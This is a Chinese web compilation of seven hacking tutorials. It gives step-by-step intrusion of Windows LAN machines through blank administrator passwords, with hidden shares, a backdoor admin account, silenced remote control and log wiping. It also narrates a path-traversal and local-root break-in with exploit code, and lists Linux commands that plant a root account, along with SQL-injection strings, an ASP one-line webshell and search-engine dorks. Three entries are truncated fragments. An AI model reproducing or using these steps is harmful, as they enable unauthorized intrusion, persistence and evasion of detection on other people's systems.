如何入侵XP(xp入侵教程)(共7篇)由网友“lunuy877”投稿提供,以下是小编为大家准备的如何入侵XP(xp入侵教程),仅供参考,欢迎大家阅读。
篇1:局域网入侵教程
首先申明:
1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子, 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。) 入侵步骤: 1.使用“NTscan变态扫描器”,在IP处填上要扫描的IP范围,选择“WMI扫描”方式,按“开始”后就等扫描结果了。
2.使用“Recton--D贺免杀专用版” 选择“CMD命令”项,在“CMD:”中输入“net share C$=C:\”,即可开启远程主机的C盘共享,以此将“C”换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入“\\对方IP\C$”,即可进入对方C盘。 选择“Telnet”项,在“远程主机”中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在“CMD选项”中,执行命令:“net share ipc$”,接着执行:“net share admin$”,最后执行“net use \\***.***.***.***\IPC$ ”“ /user:administrator”在*处填入你入侵的主机IP。
3.使用“DameWare迷你中文版 4.5”,安装后点“DameWare Mini Remote Control”,在“帮助”项中选择激活产品,输入注册信息,成功注册后,进入“远程连接”窗口,在“主机”处填入IP地址,点“设置”,在“服务安装选项”中点“编辑”后,在“通知对话框”中去掉“连接时通知”,在“附加设置”中全都不选,在“用户选项”中去掉“启用用户选项菜单”。设置完成好后,就可点“连接”,在弹出的对话框中点“确定”后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份,
入侵步骤补充: 1.在以上第2步中,远程启动Telnet服务可以通过“我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动”完成。
2.Recton--D贺免杀专用版还有其他功能,在“进程”项中,可以查看远程主机的进程,并可任意结束其中进程;在“共享”项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\,D:\等,共享好后在地址栏中输入“\\IP\C$”,进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选“日志”,清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。
3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先“telnet IP”,telnet上去,键入y后输入的用户名“administrator”,密码为空, 进入后,开共享用net share命令,共享C$(即C盘):“net share C$=C:”,共享system文件夹:“net share c=c:\winnt\system32”,共享IPC$用:“net share IPC$”等,最后是关闭共享,关闭C盘共享:“net share C$ /del”。
4.为方便下次入侵,可以设置后门, 查看用户:“net user”,激活guest用户 “net user guest /active:yes”,更改guest的密码为poco:“net user guest poco”,把guest的权限提升为管理员权限:“net localgroup administrators guest /add”。 5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:“”dir d:\“,查看C盘program file文件夹:”dir c:\PROGRA~1\;“,60秒倒记时关机:”shutdown -s -t 60“
篇2:无线网络入侵教程
相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单,
无线网络入侵教程
,
部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技
篇3:如何入侵XP(xp入侵教程)
最近有好多人都在问如何入侵XP,而且还都在用入侵的老方法对付XP。这是行不通的。 我做了一个总结,看看可以使你对XP有一个清醒的认识,并从中找出一些入侵XP的好的方法,
入侵xp一向来都是很困难,但并不是不能入侵。 只是xp的安全性相对于windows其它糸
篇4:如何入侵博客(博客入侵教程)
漏洞一:数据库下载漏洞 第一步,搜索攻击目标 打开搜索引擎,搜索Pragram by Dlog,可以找到许多博客页面,这些博客都是使用Dlog破废墟修改版建立的,
如何入侵博客(博客入侵教程)
,
我们要找的叶面是存在暴库漏洞的1.2版本。许多用户都忽视了这个版本中内嵌的eWebEditor在线编辑数据库的
篇5:渗透入侵教程分析
废话不说,开工
C:\Documents and Settings\Administrator>ping www.xxx.com
Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Ping statistics for 192.168.0.252:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
文章中IP为假的 在这里不公布真正IP
看TTL的返回信息判断系统应该不是真的 现在可以改这个
先扫描他看看吧
结果只开了 21 22 80
看来成功率不算打 FTP并没有若口令 80也没什么信息
看来了他站里 发现分有bbs.xxx.com 和 news.xxx.com 而且IP都不一样 看来想办法渗透了。
首先去bbs.xxx.com看看 用的程序似乎是绿盟那样子的 呵呵 似乎没什么漏洞 先放边上。
看看服务器开的端口情况
开了 21 22 80 也没什么漏洞
在看看news.xxx.com
经过扫描 判断服务器应该是 NT/
21 80 389 1002 3389
基本上也没什么漏洞 21 没若口令 这个是IIS的 检查了一便也没什么漏洞 389 也没什么用 3389 不可能有输入法吧登陆看看系统
2000server的
news.xxx.com用的程序是asp的 想到了SQL注入。不过彻底查看了一下 所有的都过滤了。
有点郁闷了
jswz.xxx.com
也是一个分页 不过这个另我非常的意外 用的是cgi的 系统是linux
21 22 80
扫了一下有个漏洞
cal_make.pl 看名字有点熟悉 看了一下 不过一直没想起来
去了国外的几个站 终于发现了~~~
Name : PerlCal
About : cal_make.pl of the PerlCal script. may allow remote users(website visitors) to vIEw any file on a webserver
(dependingon the user the webserver is running on).
Exploit:
_make.pl?\” target=_blank>www.VULNERABLE.com/cgi-bin/cal_make.pl?\
p0=../../../../../../../../../../../../etc/passwd
by: stan
呵呵 感谢hack.co.za
在浏览器地址栏输入
_make.pl?p0=../../../../../../../../../../../../../etc/passwd“ target=_blank>www.xxx.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../etc/passwd
好多用户信息 不过这是一个shadow过了passwd 好不容易的机会 不能放弃!
想办法 跑这些用户吧~~~
提炼用户名 希望有弱口令
提炼过程大家参考一些资料去吧
一共20多个用户 跑出来了2个 哈哈,
。~~
用SSH登陆~
权限似乎非常低
用第二个试试
哎 还是一样
看看提升权限吧~~
经过一番折腾 100%确定是rh73 内核Linux kernel 2.4
用do_brk的益出~
#include
#include
#include
char hellc0de[] =
”\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65“
”\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74“
”\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30“
”\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20“
”\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74“
”\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75“
”\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh“;
int main
{
FILE *fp;
char *offset;
fp=fopen(”/tmp/own.c“,”w“);
fprintf(fp,”%s“,hellc0de);
fclose(fp);
system(”gcc -shared -o /tmp/own.so /tmp/own.c;rm /tmp/own.c“);
system(”LD_PRELOAD=/tmp/own.so /bin/sh“);
return 0;
}
郁闷 行不通
想别的办法
试试 do_mremap VMA本地权限提升漏洞
Linux内核中mremap(2)系统调用由于没有对函数返回值进行检查,本地攻击者可以利用这个漏洞获得root用户权限。
mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。mremap()系统调用提供对已存在虚拟内存区域调整大小。从VMA区域移动部分虚拟内存到新的区域需要建立一个新的VMA描述符,也就是把由VMA描述的下面的页面表条目(page table entrIEs)从老的区域拷贝到进程页表中新的位置。
要完成这个任务do_mremap代码需要调用do_munmap()内部内核函数去清除在新位置中任何已经存在的内存映射,也就是删除旧的虚拟内存映射。不幸的是代码没有对do_munmap()函数的返回值进行检查,如果可用VMA描述符的最大数已经超出,那么函数调用就可能失败。
:):):)
[1] [2] 下一页
篇6:linux入侵常用命令服务器教程
cat /etc/passwd 查看linux用户cat /etc/shadow 查看用户密码需要root权限
cat /etc/passwd 查看linux用户
cat /etc/shadow 查看用户密码需要root权限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息
ifconfig 查看本机ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反弹的shell中使用可以直观显示命令
bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt,当你以Root登陆时,你的prompt会变成
bash#。
系统变量 : 试着echo ”$USER / $EUID“ 系统应该会告诉你它认为你是什么用户。
echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!
netstat -an grep LISTEN grep :80 查看端口
service --status-all grep running
service --status-all grep http
查看运行服务
lsb_release -a 查看系统版本
重启ssh服务 :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
将其改为
PasswordAuthentication yes
远程ssh才可登录
否则显示Access denied
其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法
先chomod 777 /etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp /bin/bash /sbin/nologin
然后su的时候su - bin就可以到rootshell了,
这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法
还可以这样
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo ”nosec:x:0:0::/:/bin/sh“ >>/etc/passwd
echo ”nosec::-1:-1:-1:-1:-1:-1:500" >>/etc/shadow
清空last记录 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero f=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。
篇7:网站教程了解网站入侵的常用方法
首先,观察指定网站,
入侵指定网站是需要条件的:
要先观察这个网站是动态还是静态的。
首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、JSP等代码编写的站点
如果是静态的(.htm或html),一般是不会成功的。
如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。
以下是入侵网站常用方法:
1.上传漏洞
如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞
字符过滤不严造成的
3.暴库:把二级目录中间的/换成%5c
4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ’ or ’a’=’a
5.社会工程学。这个我们都知道吧。就是猜解。
6.写入ASP格式数据库。就是一句话木马〈%execute request(“value”)%〉 (数据库必需得是ASP或ASA的后缀)
7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.
比如:默认数据库,默认后台地址,默认管理员帐号密码等
8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
s/Databackup/dvbbs7.MDB
s/Data/dvbbs7.MDB
/data/dvbbs7.mdb
s/diy.asp
/diy.asp
s/cmd.asp
s/cmd.exe
s/s-u.exe
srvu.exe
工具:网站猎手 挖掘鸡 明小子
9.查看目录法:一些网站可以断开目录,可以访问目录,
210.37.95.65 images
10.工具溢出
11.搜索引擎利用:
(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 〈关键字很多,自已找〉
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
12.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。
13.利用常见的漏洞:如动网BBS
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具 动网固顶贴工具
14.还有一些老漏洞。如IIS3,4的查看源码,5的Delete
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
★ 计算机系毕业论文
【如何入侵XP(xp入侵教程)(共7篇)】相关文章:
winserver终端服务自带的一些工具的简介2023-09-13
NFS服务器安全的解析和解决2024-04-10
服务器专用软件防火墙点评2022-05-08
金山毒霸使用教程之清理专家功能篇2022-10-25
金山毒霸使用教程之防御监控2023-08-01
网站科普:一张图带你了解网站的内部结构2023-07-22
计算机毕业论文范文模板2023-10-18
qq远程协助怎么用,教您如何使用QQ远程协助2023-06-28
教你熟知Cookies文件的欺骗2023-04-10
计算机网络信息安全现况论文2023-07-15